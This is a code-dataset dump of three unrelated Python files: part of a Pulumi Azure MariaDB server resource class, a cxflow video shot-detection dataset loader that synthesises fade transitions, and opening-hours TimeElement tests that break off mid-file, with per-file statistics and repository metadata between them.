__props__.__dict__["auto_grow_enabled"] = auto_grow_enabled
__props__.__dict__["backup_retention_days"] = backup_retention_days
__props__.__dict__["create_mode"] = create_mode
__props__.__dict__["creation_source_server_id"] = creation_source_server_id
__props__.__dict__["geo_redundant_backup_enabled"] = geo_redundant_backup_enabled
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["restore_point_in_time"] = restore_point_in_time
if sku_name is None and not opts.urn:
raise TypeError("Missing required property 'sku_name'")
__props__.__dict__["sku_name"] = sku_name
if ssl_enforcement is not None and not opts.urn:
warnings.warn("""this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""ssl_enforcement is deprecated: this has been moved to the boolean attribute `ssl_enforcement_enabled` and will be removed in version 3.0 of the provider.""")
__props__.__dict__["ssl_enforcement"] = ssl_enforcement
__props__.__dict__["ssl_enforcement_enabled"] = ssl_enforcement_enabled
__props__.__dict__["storage_mb"] = storage_mb
if storage_profile is not None and not opts.urn:
warnings.warn("""all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""", DeprecationWarning)
pulumi.log.warn("""storage_profile is deprecated: all storage_profile properties have been moved to the top level. This block will be removed in version 3.0 of the provider.""")
__props__.__dict__["storage_profile"] = storage_profile
__props__.__dict__["tags"] = tags
if version is None and not opts.urn:
raise TypeError("Missing required property 'version'")
__props__.__dict__["version"] = version
__props__.__dict__["fqdn"] = None
super(Server, __self__).__init__(
'azure:mariadb/server:Server',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
administrator_login: Optional[pulumi.Input[str]] = None,
administrator_login_password: Optional[pulumi.Input[str]] = None,
auto_grow_enabled: Optional[pulumi.Input[bool]] = None,
backup_retention_days: Optional[pulumi.Input[int]] = None,
create_mode: Optional[pulumi.Input[str]] = None,
creation_source_server_id: Optional[pulumi.Input[str]] = None,
fqdn: Optional[pulumi.Input[str]] = None,
geo_redundant_backup_enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
restore_point_in_time: Optional[pulumi.Input[str]] = None,
sku_name: Optional[pulumi.Input[str]] = None,
ssl_enforcement: Optional[pulumi.Input[str]] = None,
ssl_enforcement_enabled: Optional[pulumi.Input[bool]] = None,
storage_mb: Optional[pulumi.Input[int]] = None,
storage_profile: Optional[pulumi.Input[pulumi.InputType['ServerStorageProfileArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None) -> 'Server':
"""
Get an existing Server resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] administrator_login: The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] administrator_login_password: The Password associated with the `administrator_login` for the MariaDB Server.
:param pulumi.Input[bool] auto_grow_enabled: Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
:param pulumi.Input[int] backup_retention_days: Backup retention days for the server, supported values are between `7` and `35` days.
:param pulumi.Input[str] create_mode: The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
:param pulumi.Input[str] creation_source_server_id: For creation modes other than `Default`, the source server ID to use.
:param pulumi.Input[str] fqdn: The FQDN of the MariaDB Server.
:param pulumi.Input[bool] geo_redundant_backup_enabled: Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[bool] public_network_access_enabled: Whether or not public network access is allowed for this server. Defaults to `true`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] restore_point_in_time: When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
:param pulumi.Input[str] sku_name: Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
:param pulumi.Input[bool] ssl_enforcement_enabled: Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
:param pulumi.Input[int] storage_mb: Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] version: Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServerState.__new__(_ServerState)
__props__.__dict__["administrator_login"] = administrator_login
__props__.__dict__["administrator_login_password"] = administrator_login_password
__props__.__dict__["auto_grow_enabled"] = auto_grow_enabled
__props__.__dict__["backup_retention_days"] = backup_retention_days
__props__.__dict__["create_mode"] = create_mode
__props__.__dict__["creation_source_server_id"] = creation_source_server_id
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["geo_redundant_backup_enabled"] = geo_redundant_backup_enabled
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["public_network_access_enabled"] = public_network_access_enabled
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["restore_point_in_time"] = restore_point_in_time
__props__.__dict__["sku_name"] = sku_name
__props__.__dict__["ssl_enforcement"] = ssl_enforcement
__props__.__dict__["ssl_enforcement_enabled"] = ssl_enforcement_enabled
__props__.__dict__["storage_mb"] = storage_mb
__props__.__dict__["storage_profile"] = storage_profile
__props__.__dict__["tags"] = tags
__props__.__dict__["version"] = version
return Server(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="administratorLogin")
def administrator_login(self) -> pulumi.Output[str]:
"""
The Administrator Login for the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "administrator_login")
@property
@pulumi.getter(name="administratorLoginPassword")
def administrator_login_password(self) -> pulumi.Output[Optional[str]]:
"""
The Password associated with the `administrator_login` for the MariaDB Server.
"""
return pulumi.get(self, "administrator_login_password")
@property
@pulumi.getter(name="autoGrowEnabled")
def auto_grow_enabled(self) -> pulumi.Output[bool]:
"""
Enable/Disable auto-growing of the storage. Storage auto-grow prevents your server from running out of storage and becoming read-only. If storage auto grow is enabled, the storage automatically grows without impacting the workload. The default value if not explicitly specified is `true`.
"""
return pulumi.get(self, "auto_grow_enabled")
@property
@pulumi.getter(name="backupRetentionDays")
def backup_retention_days(self) -> pulumi.Output[int]:
"""
Backup retention days for the server, supported values are between `7` and `35` days.
"""
return pulumi.get(self, "backup_retention_days")
@property
@pulumi.getter(name="createMode")
def create_mode(self) -> pulumi.Output[Optional[str]]:
"""
The creation mode. Can be used to restore or replicate existing servers. Possible values are `Default`, `Replica`, `GeoRestore`, and `PointInTimeRestore`. Defaults to `Default`.
"""
return pulumi.get(self, "create_mode")
@property
@pulumi.getter(name="creationSourceServerId")
def creation_source_server_id(self) -> pulumi.Output[Optional[str]]:
"""
For creation modes other than `Default`, the source server ID to use.
"""
return pulumi.get(self, "creation_source_server_id")
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[str]:
"""
The FQDN of the MariaDB Server.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="geoRedundantBackupEnabled")
def geo_redundant_backup_enabled(self) -> pulumi.Output[bool]:
"""
Turn Geo-redundant server backups on/off. This allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. This provides better protection and ability to restore your server in a different region in the event of a disaster. This is not supported for the Basic tier.
"""
return pulumi.get(self, "geo_redundant_backup_enabled")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="publicNetworkAccessEnabled")
def public_network_access_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether or not public network access is allowed for this server. Defaults to `true`.
"""
return pulumi.get(self, "public_network_access_enabled")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the MariaDB Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="restorePointInTime")
def restore_point_in_time(self) -> pulumi.Output[Optional[str]]:
"""
When `create_mode` is `PointInTimeRestore`, specifies the point in time to restore from `creation_source_server_id`.
"""
return pulumi.get(self, "restore_point_in_time")
@property
@pulumi.getter(name="skuName")
def sku_name(self) -> pulumi.Output[str]:
"""
Specifies the SKU Name for this MariaDB Server. The name of the SKU, follows the `tier` + `family` + `cores` pattern (e.g. `B_Gen4_1`, `GP_Gen5_8`). For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#sku).
"""
return pulumi.get(self, "sku_name")
@property
@pulumi.getter(name="sslEnforcement")
def ssl_enforcement(self) -> pulumi.Output[str]:
return pulumi.get(self, "ssl_enforcement")
@property
@pulumi.getter(name="sslEnforcementEnabled")
def ssl_enforcement_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies if SSL should be enforced on connections. Possible values are `true` and `false`.
"""
return pulumi.get(self, "ssl_enforcement_enabled")
@property
@pulumi.getter(name="storageMb")
def storage_mb(self) -> pulumi.Output[int]:
"""
Max storage allowed for a server. Possible values are between `5120` MB (5GB) and `1024000`MB (1TB) for the Basic SKU and between `5120` MB (5GB) and `4096000` MB (4TB) for General Purpose/Memory Optimized SKUs. For more information see the [product documentation](https://docs.microsoft.com/en-us/rest/api/mariadb/servers/create#storageprofile).
"""
return pulumi.get(self, "storage_mb")
@property
@pulumi.getter(name="storageProfile")
def storage_profile(self) -> pulumi.Output['outputs.ServerStorageProfile']:
return pulumi.get(self, "storage_profile")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
"""
Specifies the version of MariaDB to use. Possible values are `10.2` and `10.3`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "version")
| 58.832252
| 584
| 0.693273
| 8,115
| 63,480
| 5.221565
| 0.041405
| 0.068015
| 0.074434
| 0.048805
| 0.958559
| 0.950251
| 0.941637
| 0.93477
| 0.932174
| 0.920751
| 0
| 0.007841
| 0.212492
| 63,480
| 1,078
| 585
| 58.886827
| 0.839771
| 0.398929
| 0
| 0.848765
| 1
| 0.018519
| 0.163091
| 0.066393
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162037
| false
| 0.041667
| 0.010802
| 0.009259
| 0.270062
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
91c658d1f036d46d450c2bf1e5a8d99d3e35ad8b
| 16,884
|
py
|
Python
|
datasets/shots.py
|
moravecj/ShotsInVideo
|
4ba8a24b172b918766bce6b66d920c39efe32817
|
[
"MIT"
] | null | null | null |
datasets/shots.py
|
moravecj/ShotsInVideo
|
4ba8a24b172b918766bce6b66d920c39efe32817
|
[
"MIT"
] | null | null | null |
datasets/shots.py
|
moravecj/ShotsInVideo
|
4ba8a24b172b918766bce6b66d920c39efe32817
|
[
"MIT"
] | null | null | null |
import logging
import os
import numpy as np
import cxflow as cx
import cv2
import random
import copy
import time
class ShotsDataset(cx.BaseDataset):
def __new_shot(self, pom_labels, train):
if train:
index = random.randint(0, len(self._train) - 1)
x = self._train[index]
else:
index = random.randint(0, len(self._test) - 1)
x = self._test[index]
s = random.randint(0, len(pom_labels[x]) - 1)
shot = pom_labels[x][s]
leng = random.randint(10, self._max_shot_length)
if shot[1] - shot[0] > leng:
shot[0] = random.randint(shot[0], shot[1] - leng)
shot[1] = shot[0] + min(shot[1] - shot[0], leng)
pom_labels[x].pop(s)
if len(pom_labels[x]) == 0:
if train:
self._train = np.delete(self._train, index)
else:
self._test = np.delete(self._test, index)
return shot, x, pom_labels
def __number_of_shots_left(self, lbls) -> int:
count = 0
for i in self._train:
count += len(lbls[i])
return count
def __fill_vectors_from_frame(self, beg):
ind = self._frames_remember
self._images[beg, 0:ind, :, :, :] = \
self._images[self._frame - 1, (self._num_of_frames - ind):, :, :, :]
self._labels[beg, 0:ind] = \
self._labels[self._frame - 1, (self._num_of_frames - ind):]
self._frames_needed = self._num_of_frames - ind
def __fill_vectors_from_frame_without_labels(self, beg):
ind = self._frames_remember
self._images[beg, 0:ind, :, :, :] = \
self._images[self._frame - 1, (self._num_of_frames - ind):, :, :, :]
self._frames_needed = self._num_of_frames - ind
def __add_image_and_label_to_batch(self, img, lab) -> bool:
img = np.array(img, dtype=np.float32)
img /= 255
#if lab == 0 and random.random() < 0.1:
# img = img + random.uniform(0, 0.3)
if self._frame == self._batch_size:
self.__fill_vectors_from_frame(0)
self._frame = 0
if self._frames_needed > 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._labels[self._frame, self._num_of_frames - self._frames_needed] = lab
self._frames_needed -= 1
if self._frames_needed == 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._labels[self._frame, self._num_of_frames - self._frames_needed] = lab
self._frames_needed -= 1
self._frame += 1
if self._frame == self._batch_size:
return True
else:
self.__fill_vectors_from_frame(self._frame)
return False
def __add_image_only(self, img) -> bool:
img = np.array(img, dtype=np.float32)
img /= 255
if self._frame == self._batch_size:
self.__fill_vectors_from_frame_without_labels(0)
self._frame = 0
if self._frames_needed > 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._frames_needed -= 1
if self._frames_needed == 1:
self._images[self._frame, self._num_of_frames - self._frames_needed, :, :, :] = img
self._frames_needed -= 1
self._frame += 1
if self._frame == self._batch_size:
return True
else:
self.__fill_vectors_from_frame_without_labels(self._frame)
return False
def __read_labels(self) -> None:
idx = 0
for fn in os.listdir(os.path.join(self._data_root, 'labels')):
x = []
start = 1
with open(os.path.join(self._data_root, 'labels', fn)) as f:
for line in f:
curr = int(line) + 1
if curr != start:
x.append([start - 1, curr - 2])
start = curr + 1
cap = cv2.VideoCapture(self._videos_dir[idx])
fc = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
cap.release()
self._count = self._count + fc - 1
if len(x) > 0:
x.append([start - 2, fc - 1])
else:
x.append([start - 1, fc - 1])
self._labels_dir.append(x)
idx = idx + 1
def _configure_dataset(self, data_root='Dataset', batch_size: int=50, num_of_frames: int=100,
length_of_fadein: int = 10, size_of_pictures: int = 32, **kwargs) -> None:
self._batch_size = batch_size
self._data_root = data_root
self._videos_dir = [f.path for f in os.scandir(os.path.join(data_root, 'TRECVidSubset100')) if f.is_file()]
self._labels_dir = []
self._count = 0
self.__read_labels()
self._num_of_frames = num_of_frames
self._frame = 0
self._size_of_pictures = size_of_pictures
self._images = np.zeros((self._batch_size, self._num_of_frames, self._size_of_pictures, self._size_of_pictures, 3), dtype=np.float32)
self._labels = np.zeros((self._batch_size, self._num_of_frames), dtype=np.int64)
self._count_in_batch = self._batch_size * self._num_of_frames
self._length_of_fadein = 50
self._perm = np.random.permutation(len(self._labels_dir))
self._max_shot_length = 30
self._black_frame = np.zeros((self._size_of_pictures, self._size_of_pictures, 3), dtype=np.uint8)
self._frames_needed = self._num_of_frames
self._frames_remember = self._num_of_frames - 1
self._dat_index = 0
def train_stream(self) -> cx.Stream:
#self._frame = -self._num_of_frames
self._frame = 0
self._frames_needed = self._num_of_frames
self._train = self._perm[:85]
pom_labels = copy.deepcopy(self._labels_dir)
index = random.randint(0, len(self._train) - 1)
x = self._train[index]
s = random.randint(0, len(pom_labels[x]) - 1)
shot = pom_labels[x][s]
leng = random.randint(10, self._max_shot_length)
if shot[1] - shot[0] > leng:
shot[0] = random.randint(shot[0], shot[1] - leng)
shot[1] = shot[0] + min(shot[1] - shot[0], leng)
pom_labels[x].pop(s)
if len(pom_labels[x]) == 0:
self._train = np.delete(self._train, index)
cap = cv2.VideoCapture(self._videos_dir[x])
idx = 0
i = 0
while True:
i = i + 1
if shot[0] + idx < shot[1]:
cap.set(1, shot[0] + idx)
ret, buf = cap.read()
buf = cv2.resize(buf, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(buf, 0):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
elif shot[0] + idx == shot[1]:
cap.set(1, shot[0] + idx)
ret, fr1 = cap.read()
fr1 = cv2.resize(fr1, (self._size_of_pictures, self._size_of_pictures))
choice = random.random()
if choice >= 0.5:
if self.__add_image_and_label_to_batch(fr1, 1):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
if choice < 0.75:
if len(self._train) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, True)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(self._black_frame, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
elif choice >= 0.25:
if self.__add_image_and_label_to_batch(fr1, 1):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(1, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, self._black_frame, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._train) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, True)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._train) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, True)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
def test_stream(self) -> cx.Stream:
self._frame = 0
self._frames_needed = self._num_of_frames
self._test = self._perm[85:]
pom_labels = copy.deepcopy(self._labels_dir)
index = random.randint(0, len(self._test) - 1)
x = self._test[index]
s = random.randint(0, len(pom_labels[x]) - 1)
shot = pom_labels[x][s]
leng = random.randint(10, self._max_shot_length)
if shot[1] - shot[0] > leng:
shot[0] = random.randint(shot[0], shot[1] - leng)
shot[1] = shot[0] + min(shot[1] - shot[0], leng)
pom_labels[x].pop(s)
if len(pom_labels[x]) == 0:
self._test = np.delete(self._test, index)
cap = cv2.VideoCapture(self._videos_dir[x])
idx = 0
i = 0
while True:
i = i + 1
if shot[0] + idx < shot[1]:
cap.set(1, shot[0] + idx)
ret, buf = cap.read()
buf = cv2.resize(buf, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(buf, 0):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
elif shot[0] + idx == shot[1]:
cap.set(1, shot[0] + idx)
ret, fr1 = cap.read()
fr1 = cv2.resize(fr1, (self._size_of_pictures, self._size_of_pictures))
choice = random.random()
if choice >= 0.5:
if self.__add_image_and_label_to_batch(fr1, 1):
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
if choice < 0.75:
if len(self._test) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, False)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(self._black_frame, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
elif choice >= 0.25:
if self.__add_image_and_label_to_batch(fr1, 1):
# print(self._images.shape, ' ', self._labels.shape)
yield {'images': self._images, 'labels': self._labels}
idx = idx + 1
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(1, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, self._black_frame, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._test) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, False)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
cap.set(1, shot[0] + idx)
ret, fr2 = cap.read()
fr2 = cv2.resize(fr2, (self._size_of_pictures, self._size_of_pictures))
length_of_fadein = random.randint(10, self._length_of_fadein)
for IN in range(0, length_of_fadein + 1):
fadein = IN / float(length_of_fadein)
dst = cv2.addWeighted(fr1, 1 - fadein, fr2, fadein, 0)
dst = cv2.resize(dst, (self._size_of_pictures, self._size_of_pictures))
if self.__add_image_and_label_to_batch(dst, 1):
yield {'images': self._images, 'labels': self._labels}
else:
if len(self._test) == 0:
break
shot, x, pom_labels = self.__new_shot(pom_labels, False)
idx = 0
cap.release()
cap = cv2.VideoCapture(self._videos_dir[x])
def predict_stream(self) -> cx.Stream:
file = '23553'
cap = cv2.VideoCapture('D:/RAIDataset/video_rai/' + file + '.mp4')
fc = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
idx = 0
start = time.time()
bid = 0
while idx < fc:
buf = cv2.imread('D:/RAIDataset/video_rai/' + file + '/' + str(idx) + '.bmp')
#cap.set(1, idx)
#ret, buf = cap.read()
#buf = cv2.resize(buf,(32,32))
if self.__add_image_only(buf):
img = copy.deepcopy(self._images[0, 0, :, :, :])
img *= 255
cv2.imwrite('D:/outPy/' + str(bid) + 'a.bmp', img)
yield {'images': self._images, 'id': str(bid)}
bid += 1
idx += 1
end = time.time()
logging.info(end - start)
| 41.080292
| 142
| 0.503021
| 2,027
| 16,884
| 3.864825
| 0.081894
| 0.026806
| 0.062548
| 0.075823
| 0.818484
| 0.804315
| 0.79206
| 0.757595
| 0.749043
| 0.728236
| 0
| 0.031787
| 0.386994
| 16,884
| 410
| 143
| 41.180488
| 0.725121
| 0.013385
| 0
| 0.748447
| 0
| 0
| 0.016194
| 0.002955
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034161
| false
| 0
| 0.024845
| 0
| 0.080745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91d8e0454004691025114d7b7a4b39903ad72afe
| 11,479
|
py
|
Python
|
hours/tests/test_time_element.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 3
|
2020-03-26T05:04:30.000Z
|
2022-03-22T15:57:18.000Z
|
hours/tests/test_time_element.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 81
|
2020-06-17T14:31:11.000Z
|
2022-02-20T19:01:54.000Z
|
hours/tests/test_time_element.py
|
SuviVappula/hauki
|
1af20d3a2e6fd7f7ca2834aaa52d3355aa658dfb
|
[
"MIT"
] | 9
|
2020-06-18T10:52:09.000Z
|
2022-02-11T13:05:59.000Z
|
import datetime
from hours.enums import State
from hours.models import TimeElement, combine_and_apply_override
def test_combine_and_apply_override_full_day_override():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.CLOSED,
override=True,
full_day=True,
)
assert combine_and_apply_override([te1, te2]) == [te2]
def test_combine_and_apply_override_combine_two_same():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=10, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_start():
te1 = TimeElement(
start_time=None,
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=10, minute=0),
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=None,
end_time=datetime.time(hour=16, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_end():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=datetime.time(hour=10, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_start_and_end():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_combine_two_same_one_unknown_start_one_unknown_end(): # noqa
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
start_time=None,
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
assert combine_and_apply_override([te1, te2]) == [
TimeElement(
start_time=None,
end_time=None,
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
]
def test_combine_and_apply_override_two_separate():
te1 = TimeElement(
start_time=datetime.time(hour=8, minute=0),
end_time=datetime.time(hour=12, minute=0),
end_time_on_next_day=False,
resource_state=State.OPEN,
override=False,
full_day=False,
)
te2 = TimeElement(
